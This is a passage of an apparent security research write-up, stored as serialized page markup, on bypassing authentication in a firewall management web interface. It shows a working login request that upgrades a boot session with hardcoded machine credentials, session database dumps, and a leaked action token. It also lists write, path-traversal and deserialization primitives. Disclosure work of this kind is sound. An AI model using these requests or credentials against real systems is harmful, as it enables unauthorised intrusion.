return",[1373,7342,7343],{"class":4640}," $_SESSION ",[1373,7345,4637],{"class":4636},[1373,7347,4641],{"class":4640},[1373,7349,7350],{"class":1379},"defined",[1373,7352,7353],{"class":4640}," $_SESSION);\n",[1373,7355,7356],{"class":1375,"line":4768},[1373,7357,6520],{"emptyLinePlaceholder":237},[1373,7359,7360,7363,7366,7368,7371,7373,7375],{"class":1375,"line":4792},[1373,7361,7362],{"class":1383}," $",[1373,7364,7365],{"class":4640},"q = new SF ",[1373,7367,4637],{"class":4636},[1373,7369,7370],{"class":4640}," !",[1373,7372,7350],{"class":1379},[1373,7374,4656],{"class":1383},[1373,7376,7377],{"class":4640},"q;\n",[1373,7379,7380],{"class":1375,"line":4798},[1373,7381,6520],{"emptyLinePlaceholder":237},[1373,7383,7384],{"class":1375,"line":4806},[1373,7385,7386],{"class":4630}," # If they were fishing for a cached session but there isn't one, return no session\n",[1373,7388,7389,7391,7393],{"class":1375,"line":4817},[1373,7390,4653],{"class":4652},[1373,7392,4656],{"class":1383},[1373,7394,7395],{"class":4640},"sid;\n",[1373,7397,7398,7400,7402,7404,7406,7408,7410,7412,7414,7416,7418],{"class":1375,"line":4825},[1373,7399,4695],{"class":4636},[1373,7401,4641],{"class":4640},[1373,7403,4700],{"class":1379},[1373,7405,1384],{"class":4640},[1373,7407,4644],{"class":1383},[1373,7409,4707],{"class":4640},[1373,7411,4710],{"class":1379},[1373,7413,4713],{"class":1387},[1373,7415,4716],{"class":1391},[1373,7417,1388],{"class":1387},[1373,7419,4721],{"class":4640},[1373,7421,7422,7424,7427,7429,7431,7433],{"class":1375,"line":4835},[1373,7423,4727],{"class":1383},[1373,7425,7426],{"class":4640},"sid = find_session_id_from_cookies(",[1373,7428,4644],{"class":1383},[1373,7430,4735],{"class":4640},[1373,7432,4667],{"class":1397},[1373,7434,7435],{"class":4640},"cookies);\n",[1373,7437,7438,7440,7442],{"class":1375,"line":4843},[1373,7439,4759],{"class":4640},[1373,7441,4762],{"class":4636},[1373,7443,4765],{"class":4640},[1373,7445,7446],{"class":1375,"line":4849},[1373,7447,7448],{"class":4630}," # Get the session ID from the cookie\n",[1373,7450,7451,7453,7456,7458,7460,7462,7465,7467],{"class":1375,"line":4877},[1373,7452,4727],{"class":1383},[1373,7454,7455],{"class":4640},"sid = ",[1373,7457,4644],{"class":1383},[1373,7459,4735],{"class":4640},[1373,7461,4667],{"class":1397},[1373,7463,7464],{"class":4640},"cookie(",[1373,7466,4644],{"class":1383},[1373,7468,7469],{"class":4640},"CGI::Session::NAME);\n",[1373,7471,7472],{"class":1375,"line":4915},[1373,7473,4795],{"class":4640},[1373,7475,7476,7478,7481,7484,7486,7488,7490],{"class":1375,"line":4931},[1373,7477,7340],{"class":4636},[1373,7479,7480],{"class":1379}," undef",[1373,7482,7483],{"class":4636}," if",[1373,7485,7370],{"class":4640},[1373,7487,7350],{"class":1379},[1373,7489,4656],{"class":1383},[1373,7491,7395],{"class":4640},[1373,7493,7494],{"class":1375,"line":4947},[1373,7495,6520],{"emptyLinePlaceholder":237},[1373,7497,7498],{"class":1375,"line":4952},[1373,7499,7500],{"class":4630}," # Initialize sfclient\n",[1373,7502,7503,7505,7507,7509,7512,7515],{"class":1375,"line":6776},[1373,7504,7340],{"class":4636},[1373,7506,7480],{"class":1379},[1373,7508,7483],{"class":4636},[1373,7510,7511],{"class":4640}," (sfclient::sfclient_Init",[1373,7513,7514],{"class":1383},"()",[1373,7516,7517],{"class":4640}," != 0);\n",[1373,7519,7520],{"class":1375,"line":6781},[1373,7521,6520],{"emptyLinePlaceholder":237},[1373,7523,7525],{"class":1375,"line":7524},24,[1373,7526,7527],{"class":4630}," # Cache the session and return it\n",[1373,7529,7531,7534,7536,7539,7541],{"class":1375,"line":7530},25,[1373,7532,7533],{"class":4640}," $_SESSION = MakeSession(",[1373,7535,4644],{"class":1383},[1373,7537,7538],{"class":4640},"sid, ",[1373,7540,4644],{"class":1383},[1373,7542,7543],{"class":4640},"silent);\n",[1373,7545,7547,7549,7551,7553,7555,7557,7559,7561,7563,7565,7567],{"class":1375,"line":7546},26,[1373,7548,4695],{"class":4636},[1373,7550,4641],{"class":4640},[1373,7552,4700],{"class":1379},[1373,7554,1384],{"class":4640},[1373,7556,4644],{"class":1383},[1373,7558,4707],{"class":4640},[1373,7560,4710],{"class":1379},[1373,7562,4713],{"class":1387},[1373,7564,4716],{"class":1391},[1373,7566,1388],{"class":1387},[1373,7568,4721],{"class":4640},[1373,7570,7572,7574,7577,7579,7581,7583,7586,7588,7591,7593],{"class":1375,"line":7571},27,[1373,7573,4727],{"class":1383},[1373,7575,7576],{"class":4640},"CURRENT_REQ_URL = ",[1373,7578,4644],{"class":1383},[1373,7580,4735],{"class":4640},[1373,7582,4667],{"class":1397},[1373,7584,7585],{"class":4640},"url",[1373,7587,4667],{"class":1397},[1373,7589,7590],{"class":4640},"path",[1373,7592,4667],{"class":1397},[1373,7594,7595],{"class":4640},"to_string;\n",[1373,7597,7599,7601,7604,7606,7608,7610],{"class":1375,"line":7598},28,[1373,7600,4727],{"class":1383},[1373,7602,7603],{"class":4640},"CURRENT_REQ_METHOD = ",[1373,7605,4644],{"class":1383},[1373,7607,4735],{"class":4640},[1373,7609,4667],{"class":1397},[1373,7611,7612],{"class":4640},"method;\n",[1373,7614,7616,7619,7621,7623,7625,7628,7630],{"class":1375,"line":7615},29,[1373,7617,7618],{"class":4640}," setCurrentReqParams(",[1373,7620,4644],{"class":1383},[1373,7622,4735],{"class":4640},[1373,7624,4667],{"class":1397},[1373,7626,7627],{"class":4640},"params",[1373,7629,4667],{"class":1397},[1373,7631,7632],{"class":4640},"to_hash);\n",[1373,7634,7636],{"class":1375,"line":7635},30,[1373,7637,4795],{"class":4640},[1373,7639,7641,7644],{"class":1375,"line":7640},31,[1373,7642,7643],{"class":4636}," else",[1373,7645,4765],{"class":4640},[1373,7647,7649,7651,7653,7655,7657,7659,7662,7665,7667],{"class":1375,"line":7648},32,[1373,7650,4727],{"class":1383},[1373,7652,7576],{"class":4640},[1373,7654,4644],{"class":1383},[1373,7656,4735],{"class":4640},[1373,7658,4667],{"class":1397},[1373,7660,7661],{"class":4640},"url( -",[1373,7663,7664],{"class":4982},"absolute",[1373,7666,4986],{"class":1397},[1373,7668,7669],{"class":4640}," 1);\n",[1373,7671,7673,7675,7677,7679,7681,7683],{"class":1375,"line":7672},33,[1373,7674,4727],{"class":1383},[1373,7676,7603],{"class":4640},[1373,7678,4644],{"class":1383},[1373,7680,4735],{"class":4640},[1373,7682,4667],{"class":1397},[1373,7684,7685],{"class":4640},"request_method;\n",[1373,7687,7689,7691,7694,7696,7698,7700,7703,7705],{"class":1375,"line":7688},34,[1373,7690,7618],{"class":4640},[1373,7692,7693],{"class":1379},"scalar",[1373,7695,4656],{"class":1383},[1373,7697,4735],{"class":4640},[1373,7699,4667],{"class":1397},[1373,7701,7702],{"class":4640},"Vars",[1373,7704,7514],{"class":1383},[1373,7706,4680],{"class":4640},[1373,7708,7710],{"class":1375,"line":7709},35,[1373,7711,4795],{"class":4640},[1373,7713,7715,7717],{"class":1375,"line":7714},36,[1373,7716,7340],{"class":4636},[1373,7718,7719],{"class":4640}," $_SESSION;\n",[1373,7721,7723],{"class":1375,"line":7722},37,[1373,7724,1855],{"class":4640},[18,7726,7727,7728,7730,7731,7734],{},"The biggest issue was very much a chicken and egg problem: We needed credentials to be able to upgrade a session. Then while staring at the authentication code for the hundredth time, it occurred to me: The current session checks that are applied to the ",[886,7729,4442],{}," session have the variables necessary for UI authentication. Attempting to use the hardcoded ",[886,7732,7733],{},"csm_processes:csmdaemon"," credentials to log in, unfortunately, causes the session to immediately expire (as is stated in the session information), and the boot session is entirely removed, locking us out of the attack path.",[18,7736,7737,7738,7740,7741,7744,7745,7747],{},"But, there's no reason that the ",[886,7739,4442],{}," session ID couldn't be upgraded by a ",[1131,7742,7743],{},"different"," machine user, and because the values are set to be able to pass UI authentication, all we had to do was take one of the hardcoded credentials that was not the ",[886,7746,4442],{}," user and authentication would be happy even if it's a non-UI machine user.",[18,7749,7750,7751,7753,7754,7756,7757,7760,7761,7763],{},"Sure enough, we could authenticate with ",[886,7752,4472],{}," credentials with the ",[886,7755,6264],{}," session set, after which the ",[886,7758,7759],{},"MakeSession"," function is called as the ",[886,7762,5061],{}," user, the checks validate the machine user as a UI user, and the session values are updated.",[1354,7765,7767],{"className":6275,"code":7766,"language":6277,"meta":219,"style":219},"POST \u002Flogin.cgi?logon=Continue HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes;\nContent-Length: 43\nAccept-Language: en-US,en;q=0.9\nOrigin: https:\u002F\u002F10.0.0.226\nContent-Type: application\u002Fx-www-form-urlencoded\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nConnection: keep-alive\n\nusername=report&password=snortrules&target=\n",[886,7768,7769,7782,7790,7799,7808,7816,7826,7834,7842,7851,7859,7863],{"__ignoreMap":219},[1373,7770,7771,7773,7776,7778,7780],{"class":1375,"line":1376},[1373,7772,6946],{"class":4636},[1373,7774,7775],{"class":4640}," \u002Flogin.cgi?logon=Continue ",[1373,7777,6290],{"class":5387},[1373,7779,2180],{"class":4640},[1373,7781,6295],{"class":5467},[1373,7783,7784,7786,7788],{"class":1375,"line":220},[1373,7785,6301],{"class":6300},[1373,7787,4606],{"class":5387},[1373,7789,6306],{"class":1391},[1373,7791,7792,7794,7796],{"class":1375,"line":1266},[1373,7793,6565],{"class":6300},[1373,7795,4606],{"class":5387},[1373,7797,7798],{"class":1391}," CGISESSID=csm_processes;\n",[1373,7800,7801,7803,7805],{"class":1375,"line":1852},[1373,7802,6411],{"class":6300},[1373,7804,4606],{"class":5387},[1373,7806,7807],{"class":1391}," 43\n",[1373,7809,7810,7812,7814],{"class":1375,"line":4692},[1373,7811,6986],{"class":6300},[1373,7813,4606],{"class":5387},[1373,7815,6991],{"class":1391},[1373,7817,7818,7821,7823],{"class":1375,"line":4724},[1373,7819,7820],{"class":6300},"Origin",[1373,7822,4606],{"class":5387},[1373,7824,7825],{"class":1391}," https:\u002F\u002F10.0.0.226\n",[1373,7827,7828,7830,7832],{"class":1375,"line":4756},[1373,7829,6391],{"class":6300},[1373,7831,4606],{"class":5387},[1373,7833,7185],{"class":1391},[1373,7835,7836,7838,7840],{"class":1375,"line":4768},[1373,7837,6311],{"class":6300},[1373,7839,4606],{"class":5387},[1373,7841,6316],{"class":1391},[1373,7843,7844,7846,7848],{"class":1375,"line":4792},[1373,7845,7013],{"class":6300},[1373,7847,4606],{"class":5387},[1373,7849,7850],{"class":1391}," text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\n",[1373,7852,7853,7855,7857],{"class":1375,"line":4798},[1373,7854,6331],{"class":6300},[1373,7856,4606],{"class":5387},[1373,7858,6336],{"class":1391},[1373,7860,7861],{"class":1375,"line":4806},[1373,7862,6520],{"emptyLinePlaceholder":237},[1373,7864,7865],{"class":1375,"line":4817},[1373,7866,7867],{"class":4640},"username=report&password=snortrules&target=\n",[18,7869,7870,7871,7873,7874,7877,7878,7880,7881,4606],{},"And the session values in the database are upgraded, the server responds with a successful authentication that redirects to the UI ",[886,7872,2180],{}," and a ",[886,7875,7876],{},"Set-Cookie"," set to the already established (but now upgraded) ",[886,7879,6264],{},". The session now has more session values set, including the necessary ",[886,7882,4468],{},[1354,7884,7886],{"className":5372,"code":7885,"language":5374,"meta":219,"style":219},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions WHERE id='csm_processes';\n| $D = {'useruuid' => '616931da-e3df-11dc-8002-930b8c1d4d5e','user_access_type' => 0,'_SESSION_ID' => 'csm_processes','last_csm_refresh' => 1773962941,'current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','VMS_SESSION_ID' => 'csm_processes','_SESSION_ATIME' => 1773962943,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','username' => 'report','_SESSION_CTIME' => 1773962523,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'_SESSION_REMOTE_ADDR' => '','usertype' => 1,'_SESSION_ETIME' => 3900,'session_expire_check' => 1,'last_login' => {'remote_host_ip' => '10.0.1.10','last_login_time' => 1773951618},'sf_action_id' => 'fe8b71b0344419ae464328a578a12902','active' => 0};;$D |\n",[886,7887,7888,7922],{"__ignoreMap":219},[1373,7889,7890,7892,7894,7896,7898,7900,7902,7904,7906,7909,7912,7914,7916,7918,7920],{"class":1375,"line":1376},[1373,7891,5381],{"class":4640},[1373,7893,5384],{"class":1397},[1373,7895,5388],{"class":5387},[1373,7897,5391],{"class":4640},[1373,7899,5394],{"class":5387},[1373,7901,5397],{"class":2326},[1373,7903,59],{"class":4640},[1373,7905,5402],{"class":2326},[1373,7907,7908],{"class":5387}," WHERE",[1373,7910,7911],{"class":4640}," id",[1373,7913,5417],{"class":1397},[1373,7915,1388],{"class":1387},[1373,7917,4442],{"class":1391},[1373,7919,1388],{"class":1387},[1373,7921,4912],{"class":4640},[1373,7923,7924,7926,7928,7930,7932,7934,7936,7938,7940,7943,7945,7947,7949,7951,7953,7955,7957,7959,7961,7963,7965,7967,7969,7971,7973,7975,7977,7979,7981,7983,7986,7988,7990,7992,7994,7996,7998,8000,8002,8004,8006,8008,8010,8012,8014,8016,8018,8020,8022,8024,8026,8028,8031,8033,8035,8037,8039,8041,8043,8045,8047,8049,8051,8053,8055,8057,8059,8061,8063,8065,8067,8069,8071,8073,8075,8077,8079,8081,8083,8085,8087,8089,8091,8093,8095,8097,8099,8101,8103,8105,8107,8109,8111,8113,8115,8117,8119,8121,8123,8125,8127,8129,8131,8133,8135,8137,8139,8141,8143,8145,8147,8149,8151,8153,8155,8157,8159,8161,8163,8165,8167,8169,8171,8173,8175,8177,8179,8181,8184,8186,8188,8190,8192,8194,8196,8199,8201,8203,8205,8207,8209,8211,8213],{"class":1375,"line":220},[1373,7925,5414],{"class":4640},[1373,7927,5417],{"class":1397},[1373,7929,5420],{"class":4640},[1373,7931,1388],{"class":1387},[1373,7933,5475],{"class":1391},[1373,7935,1388],{"class":1387},[1373,7937,4986],{"class":1397},[1373,7939,4713],{"class":1387},[1373,7941,7942],{"class":1391},"616931da-e3df-11dc-8002-930b8c1d4d5e",[1373,7944,1388],{"class":1387},[1373,7946,5437],{"class":4640},[1373,7948,1388],{"class":1387},[1373,7950,5821],{"class":1391},[1373,7952,1388],{"class":1387},[1373,7954,4986],{"class":1397},[1373,7956,5557],{"class":5467},[1373,7958,5437],{"class":4640},[1373,7960,1388],{"class":1387},[1373,7962,5533],{"class":1391},[1373,7964,1388],{"class":1387},[1373,7966,4986],{"class":1397},[1373,7968,4713],{"class":1387},[1373,7970,4442],{"class":1391},[1373,7972,1388],{"class":1387},[1373,7974,5437],{"class":4640},[1373,7976,1388],{"class":1387},[1373,7978,5709],{"class":1391},[1373,7980,1388],{"class":1387},[1373,7982,4986],{"class":1397},[1373,7984,7985],{"class":5467}," 1773962941",[1373,7987,5437],{"class":4640},[1373,7989,1388],{"class":1387},[1373,7991,5607],{"class":1391},[1373,7993,1388],{"class":1387},[1373,7995,4986],{"class":1397},[1373,7997,4713],{"class":1387},[1373,7999,5451],{"class":1391},[1373,8001,1388],{"class":1387},[1373,8003,5437],{"class":4640},[1373,8005,1388],{"class":1387},[1373,8007,5590],{"class":1391},[1373,8009,1388],{"class":1387},[1373,8011,4986],{"class":1397},[1373,8013,4713],{"class":1387},[1373,8015,4442],{"class":1391},[1373,8017,1388],{"class":1387},[1373,8019,5437],{"class":4640},[1373,8021,1388],{"class":1387},[1373,8023,5520],{"class":1391},[1373,8025,1388],{"class":1387},[1373,8027,4986],{"class":1397},[1373,8029,8030],{"class":5467}," 1773962943",[1373,8032,5437],{"class":4640},[1373,8034,1388],{"class":1387},[1373,8036,5442],{"class":1391},[1373,8038,1388],{"class":1387},[1373,8040,4986],{"class":1397},[1373,8042,4713],{"class":1387},[1373,8044,5451],{"class":1391},[1373,8046,1388],{"class":1387},[1373,8048,5437],{"class":4640},[1373,8050,1388],{"class":1387},[1373,8052,4870],{"class":1391},[1373,8054,1388],{"class":1387},[1373,8056,4986],{"class":1397},[1373,8058,4713],{"class":1387},[1373,8060,5061],{"class":1391},[1373,8062,1388],{"class":1387},[1373,8064,5437],{"class":4640},[1373,8066,1388],{"class":1387},[1373,8068,5506],{"class":1391},[1373,8070,1388],{"class":1387},[1373,8072,4986],{"class":1397},[1373,8074,5513],{"class":5467},[1373,8076,5437],{"class":4640},[1373,8078,1388],{"class":1387},[1373,8080,5578],{"class":1391},[1373,8082,1388],{"class":1387},[1373,8084,4986],{"class":1397},[1373,8086,5420],{"class":4640},[1373,8088,1388],{"class":1387},[1373,8090,5460],{"class":1391},[1373,8092,1388],{"class":1387},[1373,8094,4986],{"class":1397},[1373,8096,5784],{"class":5467},[1373,8098,5787],{"class":4640},[1373,8100,1388],{"class":1387},[1373,8102,5564],{"class":1391},[1373,8104,1388],{"class":1387},[1373,8106,4986],{"class":1397},[1373,8108,5571],{"class":1387},[1373,8110,5437],{"class":4640},[1373,8112,1388],{"class":1387},[1373,8114,4675],{"class":1391},[1373,8116,1388],{"class":1387},[1373,8118,4986],{"class":1397},[1373,8120,5468],{"class":5467},[1373,8122,5437],{"class":4640},[1373,8124,1388],{"class":1387},[1373,8126,6026],{"class":1391},[1373,8128,1388],{"class":1387},[1373,8130,4986],{"class":1397},[1373,8132,6033],{"class":5467},[1373,8134,5437],{"class":4640},[1373,8136,1388],{"class":1387},[1373,8138,5460],{"class":1391},[1373,8140,1388],{"class":1387},[1373,8142,4986],{"class":1397},[1373,8144,5468],{"class":5467},[1373,8146,5437],{"class":4640},[1373,8148,1388],{"class":1387},[1373,8150,5839],{"class":1391},[1373,8152,1388],{"class":1387},[1373,8154,4986],{"class":1397},[1373,8156,5420],{"class":4640},[1373,8158,1388],{"class":1387},[1373,8160,5864],{"class":1391},[1373,8162,1388],{"class":1387},[1373,8164,4986],{"class":1397},[1373,8166,4713],{"class":1387},[1373,8168,5873],{"class":1391},[1373,8170,1388],{"class":1387},[1373,8172,5437],{"class":4640},[1373,8174,1388],{"class":1387},[1373,8176,5850],{"class":1391},[1373,8178,1388],{"class":1387},[1373,8180,4986],{"class":1397},[1373,8182,8183],{"class":5467}," 1773951618",[1373,8185,5787],{"class":4640},[1373,8187,1388],{"class":1387},[1373,8189,4468],{"class":1391},[1373,8191,1388],{"class":1387},[1373,8193,4986],{"class":1397},[1373,8195,4713],{"class":1387},[1373,8197,8198],{"class":1391},"fe8b71b0344419ae464328a578a12902",[1373,8200,1388],{"class":1387},[1373,8202,5437],{"class":4640},[1373,8204,1388],{"class":1387},[1373,8206,5550],{"class":1391},[1373,8208,1388],{"class":1387},[1373,8210,4986],{"class":1397},[1373,8212,5557],{"class":5467},[1373,8214,5620],{"class":4640},[18,8216,8217,8218,8221,8222,8225],{},"Another redirect to ",[886,8219,8220],{},"\u002Fui\u002Fuser\u002Fgeneral"," can be followed, and then the FMC \"DDD\" logic renders a UI template containing a call to the template ",[886,8223,8224],{},"SF::Auth::getSFActionID()"," that renders that session value on the page:",[1354,8227,8231],{"className":8228,"code":8229,"language":8230,"meta":219,"style":219},"language-html shiki shiki-themes material-theme-lighter github-light github-dark monokai","...snip...\n \u003C!-- Global variables and functions -->\n \u003Cscript type=\"text\u002Fjavascript\">\n var sf_action_id = \"fe8b71b0344419ae464328a578a12902\";\n var __prefetch = {\"capabilities\":{\"hideMenuForOnbox\":0,\"isLamplighterEnabled\":0,\"isOnboxManaged\":0,\"showDeployDialog\":0,\"isStandbyDC\":\"0\",\"isExternalStorageEnabled\":0,\"isWorkflowEnabled\":1,\"isSyslogAllLogsToFmc\":1,\"activityId\":0,\"isCDODeployment\":0,\"isNATExemptEnabled\":1,\"isUM\":1,\"isChangeMgmtWorkflowEnabled\":0,\"exposeDNSReputationEnforcement\":1},\"static\":{\"locale\":\"en_US\",\"SF::MultiTenancy::isDomainObjInfoVisible\":{\"isDomainInfoVisible\":0}}};\n \u002F\u002F Backdraft integration\n var BackdraftSyncIntegration = (function() {\n var currentHelpTopic = undefined;\n var navMap = {};\n...snip...\n","html",[886,8232,8233,8237,8242,8265,8283,8541,8546,8565,8581,8593],{"__ignoreMap":219},[1373,8234,8235],{"class":1375,"line":1376},[1373,8236,6784],{"class":4640},[1373,8238,8239],{"class":1375,"line":220},[1373,8240,8241],{"class":4630}," \u003C!-- Global variables and functions -->\n",[1373,8243,8244,8247,8250,8254,8256,8258,8261,8263],{"class":1375,"line":1266},[1373,8245,8246],{"class":1383}," \u003C",[1373,8248,8249],{"class":6300},"script",[1373,8251,8253],{"class":8252},"s_lYk"," type",[1373,8255,5417],{"class":1383},[1373,8257,183],{"class":1387},[1373,8259,8260],{"class":1391},"text\u002Fjavascript",[1373,8262,183],{"class":1387},[1373,8264,6765],{"class":1383},[1373,8266,8267,8270,8273,8275,8277,8279,8281],{"class":1375,"line":1852},[1373,8268,8269],{"class":7293}," var",[1373,8271,8272],{"class":4640}," sf_action_id ",[1373,8274,5417],{"class":1397},[1373,8276,4883],{"class":1387},[1373,8278,8198],{"class":1391},[1373,8280,183],{"class":1387},[1373,8282,4912],{"class":1383},[1373,8284,8285,8287,8290,8292,8294,8296,8300,8302,8305,8307,8310,8312,8314,8316,8318,8320,8323,8325,8327,8329,8331,8333,8336,8338,8340,8342,8344,8346,8349,8351,8353,8355,8357,8359,8362,8364,8366,8368,8370,8372,8374,8376,8379,8381,8383,8385,8387,8389,8392,8394,8396,8398,8400,8402,8405,8407,8409,8411,8413,8415,8418,8420,8422,8424,8426,8428,8431,8433,8435,8437,8439,8441,8444,8446,8448,8450,8452,8454,8457,8459,8461,8463,8465,8467,8470,8472,8474,8476,8478,8480,8483,8485,8487,8489,8491,8493,8496,8498,8500,8502,8505,8507,8509,8511,8514,8516,8518,8520,8523,8525,8527,8529,8532,8534,8536,8538],{"class":1375,"line":4692},[1373,8286,8269],{"class":7293},[1373,8288,8289],{"class":4640}," __prefetch ",[1373,8291,5417],{"class":1397},[1373,8293,5420],{"class":1383},[1373,8295,183],{"class":1387},[1373,8297,8299],{"class":8298},"sJhdN","capabilities",[1373,8301,183],{"class":1387},[1373,8303,8304],{"class":1383},":{",[1373,8306,183],{"class":1387},[1373,8308,8309],{"class":8298},"hideMenuForOnbox",[1373,8311,183],{"class":1387},[1373,8313,4606],{"class":1383},[1373,8315,445],{"class":5467},[1373,8317,5437],{"class":1383},[1373,8319,183],{"class":1387},[1373,8321,8322],{"class":8298},"isLamplighterEnabled",[1373,8324,183],{"class":1387},[1373,8326,4606],{"class":1383},[1373,8328,445],{"class":5467},[1373,8330,5437],{"class":1383},[1373,8332,183],{"class":1387},[1373,8334,8335],{"class":8298},"isOnboxManaged",[1373,8337,183],{"class":1387},[1373,8339,4606],{"class":1383},[1373,8341,445],{"class":5467},[1373,8343,5437],{"class":1383},[1373,8345,183],{"class":1387},[1373,8347,8348],{"class":8298},"showDeployDialog",[1373,8350,183],{"class":1387},[1373,8352,4606],{"class":1383},[1373,8354,445],{"class":5467},[1373,8356,5437],{"class":1383},[1373,8358,183],{"class":1387},[1373,8360,8361],{"class":8298},"isStandbyDC",[1373,8363,183],{"class":1387},[1373,8365,4606],{"class":1383},[1373,8367,183],{"class":1387},[1373,8369,445],{"class":1391},[1373,8371,183],{"class":1387},[1373,8373,5437],{"class":1383},[1373,8375,183],{"class":1387},[1373,8377,8378],{"class":8298},"isExternalStorageEnabled",[1373,8380,183],{"class":1387},[1373,8382,4606],{"class":1383},[1373,8384,445],{"class":5467},[1373,8386,5437],{"class":1383},[1373,8388,183],{"class":1387},[1373,8390,8391],{"class":8298},"isWorkflowEnabled",[1373,8393,183],{"class":1387},[1373,8395,4606],{"class":1383},[1373,8397,467],{"class":5467},[1373,8399,5437],{"class":1383},[1373,8401,183],{"class":1387},[1373,8403,8404],{"class":8298},"isSyslogAllLogsToFmc",[1373,8406,183],{"class":1387},[1373,8408,4606],{"class":1383},[1373,8410,467],{"class":5467},[1373,8412,5437],{"class":1383},[1373,8414,183],{"class":1387},[1373,8416,8417],{"class":8298},"activityId",[1373,8419,183],{"class":1387},[1373,8421,4606],{"class":1383},[1373,8423,445],{"class":5467},[1373,8425,5437],{"class":1383},[1373,8427,183],{"class":1387},[1373,8429,8430],{"class":8298},"isCDODeployment",[1373,8432,183],{"class":1387},[1373,8434,4606],{"class":1383},[1373,8436,445],{"class":5467},[1373,8438,5437],{"class":1383},[1373,8440,183],{"class":1387},[1373,8442,8443],{"class":8298},"isNATExemptEnabled",[1373,8445,183],{"class":1387},[1373,8447,4606],{"class":1383},[1373,8449,467],{"class":5467},[1373,8451,5437],{"class":1383},[1373,8453,183],{"class":1387},[1373,8455,8456],{"class":8298},"isUM",[1373,8458,183],{"class":1387},[1373,8460,4606],{"class":1383},[1373,8462,467],{"class":5467},[1373,8464,5437],{"class":1383},[1373,8466,183],{"class":1387},[1373,8468,8469],{"class":8298},"isChangeMgmtWorkflowEnabled",[1373,8471,183],{"class":1387},[1373,8473,4606],{"class":1383},[1373,8475,445],{"class":5467},[1373,8477,5437],{"class":1383},[1373,8479,183],{"class":1387},[1373,8481,8482],{"class":8298},"exposeDNSReputationEnforcement",[1373,8484,183],{"class":1387},[1373,8486,4606],{"class":1383},[1373,8488,467],{"class":5467},[1373,8490,5787],{"class":1383},[1373,8492,183],{"class":1387},[1373,8494,8495],{"class":8298},"static",[1373,8497,183],{"class":1387},[1373,8499,8304],{"class":1383},[1373,8501,183],{"class":1387},[1373,8503,8504],{"class":8298},"locale",[1373,8506,183],{"class":1387},[1373,8508,4606],{"class":1383},[1373,8510,183],{"class":1387},[1373,8512,8513],{"class":1391},"en_US",[1373,8515,183],{"class":1387},[1373,8517,5437],{"class":1383},[1373,8519,183],{"class":1387},[1373,8521,8522],{"class":8298},"SF::MultiTenancy::isDomainObjInfoVisible",[1373,8524,183],{"class":1387},[1373,8526,8304],{"class":1383},[1373,8528,183],{"class":1387},[1373,8530,8531],{"class":8298},"isDomainInfoVisible",[1373,8533,183],{"class":1387},[1373,8535,4606],{"class":1383},[1373,8537,445],{"class":5467},[1373,8539,8540],{"class":1383},"}}};\n",[1373,8542,8543],{"class":1375,"line":4724},[1373,8544,8545],{"class":4630}," \u002F\u002F Backdraft integration\n",[1373,8547,8548,8551,8554,8556,8558,8561,8563],{"class":1375,"line":4756},[1373,8549,8550],{"class":7293}," var",[1373,8552,8553],{"class":4640}," BackdraftSyncIntegration ",[1373,8555,5417],{"class":1397},[1373,8557,4641],{"class":4640},[1373,8559,8560],{"class":7293},"function",[1373,8562,7514],{"class":1383},[1373,8564,4765],{"class":1383},[1373,8566,8567,8570,8573,8576,8579],{"class":1375,"line":4768},[1373,8568,8569],{"class":7293}," var",[1373,8571,8572],{"class":4640}," currentHelpTopic",[1373,8574,8575],{"class":1397}," =",[1373,8577,8578],{"class":7054}," undefined",[1373,8580,4912],{"class":1383},[1373,8582,8583,8585,8588,8590],{"class":1375,"line":4792},[1373,8584,8569],{"class":7293},[1373,8586,8587],{"class":4640}," navMap",[1373,8589,8575],{"class":1397},[1373,8591,8592],{"class":1383}," {};\n",[1373,8594,8595,8598,8601],{"class":1375,"line":4798},[1373,8596,8597],{"class":1397},"...",[1373,8599,8600],{"class":4640},"snip",[1373,8602,8603],{"class":1397},"...\n",[18,8605,8606,8607,8609,8610,982,8612,8614,8615,59],{},"Now that a ",[886,8608,4468],{}," is accessible, we can make calls to the previous ",[886,8611,4491],{},[886,8613,6921],{}," endpoints with the retrieved ",[886,8616,4468],{},[61,8618,8620],{"id":8619},"a-variety-of-scripts-and-commands","A Variety of Scripts and Commands",[18,8622,8623],{},"Now that we can finally reach the CGI scripts and call them, the team crawled through these functions looking for primitives to use. We identified three useful calls:",[1789,8625,8626,8643,8679],{},[25,8627,8628,8629,8631,8632,8635,8636,8638,8639,8642],{},"An arbitrary write via ",[886,8630,6921],{}," using the ",[886,8633,8634],{},"validateLicense"," call that will take arbitrary data and write it to ",[886,8637,4484],{},". Binary data can be written to that by providing JSON Unicode-escaped values, such as ",[886,8640,8641],{},"\\u000a"," for newlines.",[25,8644,8645,8646,8631,8648,8651,8652,8655,8656,8659,8660,8662,8663,8666,8667,8670,8671,8674,8675,8678],{},"An arbitrary Perl Storable deserialization via ",[886,8647,6921],{},[886,8649,8650],{},"batchResult"," function call that allows a path traversal to ",[886,8653,8654],{},"..\u002Flicense.tmp",", and then will call ",[886,8657,8658],{},"\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUI\u002FSajaxIntf.pm"," and the ",[886,8661,8650],{}," function that contains another call to ",[886,8664,8665],{},"SF::Util::DeSerialize"," that finally calls ",[886,8668,8669],{},"Storable::retrieve"," (with the unsafe ",[886,8672,8673],{},"local $Storable::Eval = $Storable::Eval = 1;"," setting). It's likely that this is exploitable to directly achieve RCE, but no usable ",[886,8676,8677],{},"STORABLE_thaw"," gadgets were found during testing.",[25,8680,8681,8682,8684,8685,8687,8688,8691],{},"An upgrade package installer function call to ",[886,8683,4495],{}," via the ",[886,8686,4491],{}," code and a set of options pointing to the ",[886,8689,8690],{},"license.tmp"," file that validates a large set of parameters and options, but can be used to run 